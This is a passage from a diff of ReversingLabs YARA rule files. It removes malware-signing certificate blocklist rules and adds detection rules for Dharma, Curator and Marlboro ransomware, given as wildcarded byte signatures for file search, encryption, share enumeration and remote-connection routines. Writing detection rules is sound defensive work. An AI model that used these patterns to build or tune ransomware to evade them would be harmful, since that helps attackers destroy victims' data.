?? ?? + 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D + 09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 + ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ?? + ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? + 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 + DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC + 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A + } + $find_files = { + 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? + ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ?? + 08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ?? + DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ?? + ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00 + DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A + } + $encrypt_files = { + 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ?? + ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MADERA" and pe.signatures[i].serial=="04:d6:b8:cc:6d:ce:35:3f:cf:3a:e8:a5:32:be:72:55" and 1451692799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($setup_attack) and ($find_files) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_191322A00200F793 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Dharma : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Dharma ransomware." author = "ReversingLabs" - id = "4011e54c-ca28-536f-8759-077fcce6d45f" - date = "2023-11-08" - modified = "2023-11-08" + id = "8157b20b-717c-581f-83c1-5fc8d2312238" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1942-L1958" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1b816785f86189817c124636e50a0f369ec85cfd898223c4ba43758a877f1cf3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Dharma.yara#L1-L108" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6f33281523b462aaff68bb04f2f6869c3e6cd60cd9306ed80bb0c3e3b699f315" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Dharma" + tc_detection_factor = 5 importance = 25 + strings: + $file_search = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? + 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 + ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? + 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 8B + 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B + 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D + ?? ?? 75 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 + 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 8B 45 ?? 8B E5 5D C3 + } + $file_encrypt_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 4D ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 8B 45 ?? 2B C2 83 E8 ?? 89 45 ?? 8B + 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? + ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 05 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? + ?? ?? 8B 4D ?? 83 E1 ?? 74 ?? 8B 55 ?? 83 E2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? + ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 89 85 ?? ?? ?? + ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D + ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? + 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 + E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D + ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B + 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 7D + ?? ?? 75 ?? 8B 4D ?? 3B 4D ?? 73 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 B8 ?? ?? ?? + ?? 2B C2 89 45 ?? 8B 4D ?? 03 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 03 45 ?? 50 8B 4D ?? 51 + } + $file_encrypt_2 = { + 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 45 ?? 39 85 ?? ?? ?? ?? + 74 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? + 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? + ?? 83 7D ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 + 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 + 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 + ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? + 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 + 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 + ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 05 ?? ?? + ?? ?? 89 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 + ?? 89 45 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 2B 55 ?? 52 8B 45 ?? 50 8B 8D ?? ?? + ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 2B 55 ?? 39 95 ?? ?? ?? ?? 74 ?? EB ?? + EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? E9 ?? + ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? + ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? + 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? + ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B E5 5D C3 + } + $enum_shares = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? + 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 E8 ?? + ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 + ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 + ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? + 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 8B 55 ?? + 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? + 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 + ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 + ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? + 52 E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F + 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D + 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB + ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? + 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 + E0 ?? 8B 4D ?? 8B 54 01 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 + 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 + 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? + 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D + ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PRABHAKAR NARAYAN" and pe.signatures[i].serial=="19:13:22:a0:02:00:f7:93" and 1442966399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $file_search and $enum_shares and $file_encrypt_1 and $file_encrypt_2 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_451C9D0B413E6E8Df175 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Curator : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Curator ransomware." author = "ReversingLabs" - id = "adc832c0-166d-52d1-aeec-2fc92ff52d02" - date = "2023-11-08" - modified = "2023-11-08" + id = "401f1d64-afd9-55b1-8e87-b808d4679e9a" + date = "2021-04-22" + modified = "2021-04-22" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1960-L1976" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7c94d87f79c9add4d7bf2a63d0774449319aa56cbc631dd9b0f19ed9bb9837d4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Curator.yara#L1-L94" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8bd29195cea0f1194e27c48ed07c52100abb7dd3de2ef7f51a645d32c3527eb3" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Curator" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PRASAD UPENDRA" and pe.signatures[i].serial=="45:1c:9d:0b:41:3e:6e:8d:f1:75" and 1442275199<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_03943858218F35Adb7073A6027555621 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "fbaf4c7a-5f20-57f7-b6b7-143fdbf0e5c2" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1978-L1994" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "93369d51b73591559494a48fafa5e4f7d46301ecaa379d8de70a70ac4d2d2728" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_p1 = { + 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF 15 ?? ?? ?? + ?? 48 8B BD ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D ?? + ?? ?? ?? 41 8B DC 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? 45 33 F6 48 8B + 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 0F BE 8C 06 ?? ?? ?? ?? 45 0F + BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 8D + ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 4D 8D 76 ?? FF C3 41 83 C4 ?? 88 84 0D + ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 3B E0 7C + ?? 4C 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 E4 48 89 44 24 ?? 48 8D 95 ?? ?? + ?? ?? 45 33 C9 44 89 64 24 ?? 44 8B C3 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? + ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 4C 24 ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? ?? ?? + ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 8D 44 24 ?? + 48 89 44 24 ?? 45 33 C9 48 8D 44 24 ?? 89 9D ?? ?? ?? ?? 33 D2 48 89 44 24 ?? FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 41 8B DC 44 39 A5 ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 ?? ?? ?? + ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 4C 04 ?? E8 ?? ?? ?? ?? 48 8D 95 ?? + ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? ?? ?? 72 ?? 48 8B 8D ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? B9 + } + $encrypt_files_p2 = { + 48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 55 41 54 41 55 41 56 41 57 48 8D A8 ?? + ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 + 85 ?? ?? ?? ?? 45 33 E4 C7 44 24 ?? ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 89 25 ?? ?? ?? + ?? 48 8D 95 ?? ?? ?? ?? 44 89 25 ?? ?? ?? ?? 33 C9 44 89 25 ?? ?? ?? ?? 45 8B FC 4C + 89 25 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 + 48 8D 85 ?? ?? ?? ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 66 44 89 20 4C 8D 05 + ?? ?? ?? ?? 48 83 C0 ?? 4C 89 64 24 ?? 48 89 05 ?? ?? ?? ?? 45 33 C9 48 8D 05 ?? ?? + ?? ?? 44 89 64 24 ?? 33 D2 48 89 05 ?? ?? ?? ?? 33 C9 FF 15 ?? ?? ?? ?? 33 D2 33 C9 + 44 8D 42 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 + ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 + 8B F0 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? + 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 + } + $find_files = { + 48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B + 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9 + BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? + 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24 + ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ?? + ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? + ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 + 5D C3 + } + $remote_connection = { + 44 0F B7 45 ?? 33 DB 48 8B 55 ?? 45 33 C9 48 89 5C 24 ?? 48 8B CE 89 5C 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? + ?? 80 7D ?? ?? B9 ?? ?? ?? ?? 4C 8B 45 ?? B8 ?? ?? ?? ?? 48 8B 55 ?? 0F 44 C8 48 89 + 5C 24 ?? 45 33 C9 89 4C 24 ?? 89 4D ?? 49 8B CE 48 89 5C 24 ?? 48 89 5C 24 ?? FF 15 + ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 4C 8D 4D ?? 4C 8D 45 ?? + C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 81 4D ?? + ?? ?? ?? ?? 4C 8D 45 ?? 41 B9 ?? ?? ?? ?? 48 8B CB 41 8D 51 ?? FF 15 ?? ?? ?? ?? 4C + 8B 4D ?? 48 8B C7 48 F7 D8 48 8B D7 8B 45 ?? 48 8B CB 45 1B C0 89 44 24 ?? FF 15 ?? + ?? ?? ?? 85 C0 74 ?? 33 FF 83 65 ?? ?? 48 8D 55 ?? 45 33 C9 45 33 C0 48 8B CB FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 49 8B CF 03 D7 E8 ?? ?? ?? ?? 44 8B 45 ?? 4C 8D 4D + ?? 8B D7 48 8B CB 48 03 D0 4C 8B F8 FF 15 ?? ?? ?? ?? 8B 45 ?? 03 F8 EB ?? 8B 45 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RuN APps FOrEver lld" and pe.signatures[i].serial=="03:94:38:58:21:8f:35:ad:b7:07:3a:60:27:55:56:21" and 1480550399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_09813Ee7318452C28A1F6426D1Cee12D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Marlboro : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Marlboro ransomware." author = "ReversingLabs" - id = "db3c1992-b6a1-5aaf-ae3a-c626b531529a" - date = "2023-11-08" - modified = "2023-11-08" + id = "7cd3b436-47e3-5711-9b59-cef70efe3b45" + date = "2020-07-23" + modified = "2020-07-23" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1996-L2012" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "89eb019192f822f9fe070403161d81e425fb8acdbc80e55fa516b5607eb8f8c7" + source_url = 